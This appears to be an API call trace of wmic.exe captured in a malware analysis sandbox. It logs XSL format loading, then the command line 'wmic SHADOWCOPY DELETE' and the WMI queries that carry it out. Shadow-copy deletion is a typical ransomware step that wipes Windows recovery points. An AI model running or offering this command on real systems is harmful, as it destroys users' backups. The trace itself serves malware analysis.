	[0040.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.164] SysStringLen (param_1="XML") returned 0x3
	[0040.164] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.164] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.165] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.165] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.165] malloc (_Size=0x30) returned 0x1383c0
	[0040.165] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.165] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.165] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.165] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=14, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.165] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="texttable.xsl") returned 0x0
	[0040.165] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.165] malloc (_Size=0x18) returned 0x13c5b0
	[0040.165] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.165] free (_Block=0x13c5b0) 
	[0040.165] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0
	[0040.165] malloc (_Size=0x18) returned 0x13c5b0
	[0040.165] malloc (_Size=0x18) returned 0x13c5d0
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.165] SysStringLen (param_1="TABLE") returned 0x5
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.165] SysStringLen (param_1="XML") returned 0x3
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.165] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.165] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.165] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.166] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.166] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0040.166] malloc (_Size=0x30) returned 0x138400
	[0040.166] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.166] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.166] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.166] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=15, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.166] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="htable.xsl") returned 0x0
	[0040.166] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.166] malloc (_Size=0x18) returned 0x13c5f0
	[0040.166] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.166] free (_Block=0x13c5f0) 
	[0040.166] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0
	[0040.166] malloc (_Size=0x18) returned 0x13c5f0
	[0040.166] malloc (_Size=0x18) returned 0x13c610
	[0040.166] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.166] SysStringLen (param_1="TABLE") returned 0x5
	[0040.166] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.166] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.166] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.166] SysStringLen (param_1="XML") returned 0x3
	[0040.166] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.166] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.166] SysStringLen (param_1="XML") returned 0x3
	[0040.166] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.166] malloc (_Size=0x30) returned 0x138440
	[0040.166] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.166] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.167] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.167] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=16, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.167] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="htable.xsl") returned 0x0
	[0040.167] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.167] malloc (_Size=0x18) returned 0x13c630
	[0040.167] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.167] free (_Block=0x13c630) 
	[0040.167] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0
	[0040.167] malloc (_Size=0x18) returned 0x13c630
	[0040.167] malloc (_Size=0x18) returned 0x13c650
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] SysStringLen (param_1="TABLE") returned 0x5
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] SysStringLen (param_1="XML") returned 0x3
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] SysStringLen (param_1="texttablewsys") returned 0xd
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
	[0040.167] SysStringLen (param_1="XML") returned 0x3
	[0040.167] SysStringLen (param_1="htable-sortby") returned 0xd
	[0040.167] malloc (_Size=0x30) returned 0x138480
	[0040.167] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.167] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.167] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.167] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=17, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.168] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="mof.xsl") returned 0x0
	[0040.168] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.168] malloc (_Size=0x18) returned 0x13c670
	[0040.168] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.168] free (_Block=0x13c670) 
	[0040.168] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0
	[0040.168] malloc (_Size=0x18) returned 0x13c670
	[0040.168] malloc (_Size=0x18) returned 0x13c690
	[0040.168] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.168] SysStringLen (param_1="TABLE") returned 0x5
	[0040.168] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.168] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.168] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.168] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.168] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.168] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.168] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.168] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.168] malloc (_Size=0x30) returned 0x1384c0
	[0040.168] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.168] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.168] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.168] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=18, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.168] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="mof.xsl") returned 0x0
	[0040.168] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.168] malloc (_Size=0x18) returned 0x13c6b0
	[0040.168] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.169] free (_Block=0x13c6b0) 
	[0040.169] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0
	[0040.169] malloc (_Size=0x18) returned 0x13c6b0
	[0040.169] malloc (_Size=0x18) returned 0x13c6d0
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] SysStringLen (param_1="TABLE") returned 0x5
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
	[0040.169] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.169] SysStringLen (param_1="wmiclimofformat") returned 0xf
	[0040.169] malloc (_Size=0x30) returned 0x138500
	[0040.169] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.169] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.169] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.169] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=19, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.169] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="textvaluelist.xsl") returned 0x0
	[0040.169] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.169] malloc (_Size=0x18) returned 0x13c6f0
	[0040.169] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.169] free (_Block=0x13c6f0) 
	[0040.170] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0
	[0040.170] malloc (_Size=0x18) returned 0x13c6f0
	[0040.170] malloc (_Size=0x18) returned 0x13c710
	[0040.170] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.170] SysStringLen (param_1="TABLE") returned 0x5
	[0040.170] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.170] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.170] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.170] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.170] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.170] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.170] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.170] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.170] malloc (_Size=0x30) returned 0x138540
	[0040.170] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.170] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.170] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.170] IXMLDOMNodeList:get_item (in: This=0x21b9cc0, index=20, listItem=0x1bf740 | out: listItem=0x1bf740*=0x21bbd50) returned 0x0
	[0040.170] IXMLDOMNode:get_text (in: This=0x21bbd50, text=0x1bf750 | out: text=0x1bf750*="textvaluelist.xsl") returned 0x0
	[0040.170] IXMLDOMNode:get_attributes (in: This=0x21bbd50, attributeMap=0x1bf748 | out: attributeMap=0x1bf748*=0x21b78d0) returned 0x0
	[0040.170] malloc (_Size=0x18) returned 0x13c730
	[0040.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21b78d0, name="KEYWORD", namedItem=0x1bf758 | out: namedItem=0x1bf758*=0x21ba280) returned 0x0
	[0040.170] free (_Block=0x13c730) 
	[0040.170] IXMLDOMNode:get_nodeValue (in: This=0x21ba280, value=0x1bf790 | out: value=0x1bf790*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0
	[0040.170] malloc (_Size=0x18) returned 0x13c730
	[0040.170] malloc (_Size=0x18) returned 0x13c750
	[0040.170] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.170] SysStringLen (param_1="TABLE") returned 0x5
	[0040.171] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.171] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0040.171] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.171] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0040.171] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.171] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.171] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.171] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
	[0040.171] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0040.171] SysStringLen (param_1="wmiclivalueformat") returned 0x11
	[0040.171] malloc (_Size=0x30) returned 0x138580
	[0040.171] IUnknown:Release (This=0x21bbd50) returned 0x0
	[0040.171] IUnknown:Release (This=0x21b78d0) returned 0x0
	[0040.171] IUnknown:Release (This=0x21ba280) returned 0x0
	[0040.171] IUnknown:Release (This=0x21b9cc0) returned 0x0
	[0040.171] FreeThreadedDOMDocument:IUnknown:Release (This=0x21bbc50) returned 0x1
	[0040.171] FreeThreadedDOMDocument:IUnknown:Release (This=0x21b71d0) returned 0x0
	[0040.171] free (_Block=0x136d70) 
	[0040.171] GetCommandLineW () returned="wmic  SHADOWCOPY DELETE"
	[0040.238] malloc (_Size=0x30) returned 0x1385c0
	[0040.238] memcpy_s (in: _Destination=0x1385c0, _DestinationSize=0x2e, _Source=0x2825be, _SourceSize=0x2e | out: _Destination=0x1385c0) returned 0x0
	[0040.238] malloc (_Size=0x18) returned 0x13c770
	[0040.238] malloc (_Size=0x18) returned 0x13c790
	[0040.238] malloc (_Size=0x18) returned 0x13c7b0
	[0040.238] malloc (_Size=0x18) returned 0x13c7d0
	[0040.238] malloc (_Size=0x80) returned 0x136d70
	[0040.238] GetLocalTime (in: lpSystemTime=0x1bf900 | out: lpSystemTime=0x1bf900*(wYear=0x7e3, wMonth=0xb, wDayOfWeek=0x5, wDay=0x8, wHour=0x0, wMinute=0xa, wSecond=0x2c, wMilliseconds=0x4b)) 
	[0040.238] _vsnwprintf (in: _Buffer=0x136d70, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1bf858 | out: _Buffer="11-08-2019T00:10:44") returned 19
	[0040.238] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.238] malloc (_Size=0x28) returned 0x136e70
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] malloc (_Size=0x28) returned 0x136ea0
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] malloc (_Size=0x16) returned 0x13c7f0
	[0040.239] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.239] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81
	[0040.239] malloc (_Size=0x16) returned 0x13c810
	[0040.239] malloc (_Size=0x8) returned 0x136e00
	[0040.239] free (_Block=0x0) 
	[0040.239] free (_Block=0x13c7f0) 
	[0040.239] lstrlenW (lpString="  SHADOWCOPY DELETE") returned 19
	[0040.239] malloc (_Size=0xe) returned 0x13c7f0
	[0040.239] lstrlenW (lpString="DELETE") returned 6
	[0040.239] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66
	[0040.239] malloc (_Size=0xe) returned 0x13c830
	[0040.239] malloc (_Size=0x10) returned 0x13c850
	[0040.239] memmove_s (in: _Destination=0x13c850, _DestinationSize=0x8, _Source=0x136e00, _SourceSize=0x8 | out: _Destination=0x13c850) returned 0x0
	[0040.239] free (_Block=0x136e00) 
	[0040.239] free (_Block=0x0) 
	[0040.239] free (_Block=0x13c7f0) 
	[0040.239] malloc (_Size=0x10) returned 0x13c7f0
	[0040.239] lstrlenW (lpString="QUIT") returned 4
	[0040.239] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3
	[0040.239] lstrlenW (lpString="EXIT") returned 4
	[0040.239] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3
	[0040.239] free (_Block=0x13c7f0) 
	[0040.240] WbemLocator:IUnknown:AddRef (This=0x1f1390) returned 0x2
	[0040.240] malloc (_Size=0x10) returned 0x13c7f0
	[0040.240] lstrlenW (lpString="/") returned 1
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3
	[0040.240] lstrlenW (lpString="-") returned 1
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3
	[0040.240] lstrlenW (lpString="CLASS") returned 5
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3
	[0040.240] lstrlenW (lpString="PATH") returned 4
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3
	[0040.240] lstrlenW (lpString="CONTEXT") returned 7
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.240] malloc (_Size=0x16) returned 0x13c870
	[0040.240] lstrlenW (lpString="SHADOWCOPY") returned 10
	[0040.292] GetCurrentThreadId () returned 0x9d4
	[0040.292] ??0CHString@@QEAA@XZ () returned 0x1bf710
	[0040.292] malloc (_Size=0x18) returned 0x13c890
	[0040.292] malloc (_Size=0x18) returned 0x13c8b0
	[0040.292] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff702998 | out: ppNamespace=0xff702998*=0x203a98) returned 0x0
	[0040.683] free (_Block=0x13c8b0) 
	[0040.683] free (_Block=0x13c890) 
	[0040.683] CoSetProxyBlanket (pProxy=0x203a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0040.684] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.684] GetCurrentThreadId () returned 0x9d4
	[0040.684] ??0CHString@@QEAA@XZ () returned 0x1bf5a8
	[0040.684] malloc (_Size=0x18) returned 0x13c890
	[0040.684] malloc (_Size=0x18) returned 0x13c8b0
	[0040.684] malloc (_Size=0x18) returned 0x13c8d0
	[0040.684] malloc (_Size=0x18) returned 0x13c8f0
	[0040.684] SysStringLen (param_1="root\\cli") returned 0x8
	[0040.684] SysStringLen (param_1="\\") returned 0x1
	[0040.684] malloc (_Size=0x18) returned 0x13c910
	[0040.684] SysStringLen (param_1="root\\cli\\") returned 0x9
	[0040.684] SysStringLen (param_1="ms_409") returned 0x6
	[0040.684] free (_Block=0x13c8f0) 
	[0040.684] free (_Block=0x13c8d0) 
	[0040.684] free (_Block=0x13c8b0) 
	[0040.684] free (_Block=0x13c890) 
	[0040.684] malloc (_Size=0x18) returned 0x13c890
	[0040.684] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7029a0 | out: ppNamespace=0xff7029a0*=0x203b28) returned 0x0
	[0040.698] free (_Block=0x13c890) 
	[0040.698] free (_Block=0x13c910) 
	[0040.698] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.698] GetCurrentThreadId () returned 0x9d4
	[0040.698] ??0CHString@@QEAA@XZ () returned 0x1bf720
	[0040.698] malloc (_Size=0x18) returned 0x13c910
	[0040.698] malloc (_Size=0x18) returned 0x13c890
	[0040.699] malloc (_Size=0x18) returned 0x13c8b0
	[0040.699] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
	[0040.699] malloc (_Size=0x3a) returned 0x13ca40
	[0040.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff691980, cbMultiByte=-1, lpWideCharStr=0x13ca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
	[0040.699] free (_Block=0x13ca40) 
	[0040.699] malloc (_Size=0x18) returned 0x13c8d0
	[0040.699] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
	[0040.699] SysStringLen (param_1="SHADOWCOPY") returned 0xa
	[0040.699] malloc (_Size=0x18) returned 0x13c8f0
	[0040.699] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26
	[0040.699] SysStringLen (param_1="'") returned 0x1
	[0040.699] free (_Block=0x13c8d0) 
	[0040.699] free (_Block=0x13c8b0) 
	[0040.699] free (_Block=0x13c890) 
	[0040.699] free (_Block=0x13c910) 
	[0040.699] IWbemServices:GetObject (in: This=0x203a98, strObjectPath="MSFT_CliAlias.FriendlyName='SHADOWCOPY'", lFlags=0, pCtx=0x0, ppObject=0x1bf728*=0x0, ppCallResult=0x0 | out: ppObject=0x1bf728*=0x2104e0, ppCallResult=0x0) returned 0x0
	[0040.727] malloc (_Size=0x18) returned 0x13c910
	[0040.727] IWbemClassObject:Get (in: This=0x2104e0, wszName="Target", lFlags=0, pVal=0x1bf650*(varType=0x0, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1=0xff702998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf650*(varType=0x8, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.727] free (_Block=0x13c910) 
	[0040.727] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.727] malloc (_Size=0x3e) returned 0x13ca40
	[0040.727] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.728] malloc (_Size=0x18) returned 0x13c910
	[0040.728] IWbemClassObject:Get (in: This=0x2104e0, wszName="PWhere", lFlags=0, pVal=0x1bf650*(varType=0x0, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ae058, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf650*(varType=0x8, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.728] free (_Block=0x13c910) 
	[0040.728] lstrlenW (lpString=" Where ID = '#'") returned 15
	[0040.728] malloc (_Size=0x20) returned 0x13ca90
	[0040.728] lstrlenW (lpString=" Where ID = '#'") returned 15
	[0040.728] malloc (_Size=0x18) returned 0x13c910
	[0040.728] IWbemClassObject:Get (in: This=0x2104e0, wszName="Connection", lFlags=0, pVal=0x1bf650*(varType=0x0, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1=0x2fd6c8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf650*(varType=0xd, wReserved1=0xff70, wReserved2=0x0, wReserved3=0x0, varVal1=0x2109c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.728] free (_Block=0x13c910) 
	[0040.728] IUnknown:QueryInterface (in: This=0x2109c0, riid=0xff697360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1bf640 | out: ppvObject=0x1bf640*=0x2109c0) returned 0x0
	[0040.728] GetCurrentThreadId () returned 0x9d4
	[0040.728] ??0CHString@@QEAA@XZ () returned 0x1bf568
	[0040.728] malloc (_Size=0x18) returned 0x13c910
	[0040.728] IWbemClassObject:Get (in: This=0x2109c0, wszName="Namespace", lFlags=0, pVal=0x1bf590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff6a738f, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.728] free (_Block=0x13c910) 
	[0040.729] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0040.729] malloc (_Size=0x16) returned 0x13c910
	[0040.729] lstrlenW (lpString="ROOT\\CIMV2") returned 10
	[0040.729] malloc (_Size=0x18) returned 0x13c890
	[0040.729] IWbemClassObject:Get (in: This=0x2109c0, wszName="Locale", lFlags=0, pVal=0x1bf590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.729] free (_Block=0x13c890) 
	[0040.729] lstrlenW (lpString="ms_409") returned 6
	[0040.729] malloc (_Size=0xe) returned 0x13c890
	[0040.729] lstrlenW (lpString="ms_409") returned 6
	[0040.729] malloc (_Size=0x18) returned 0x13c8b0
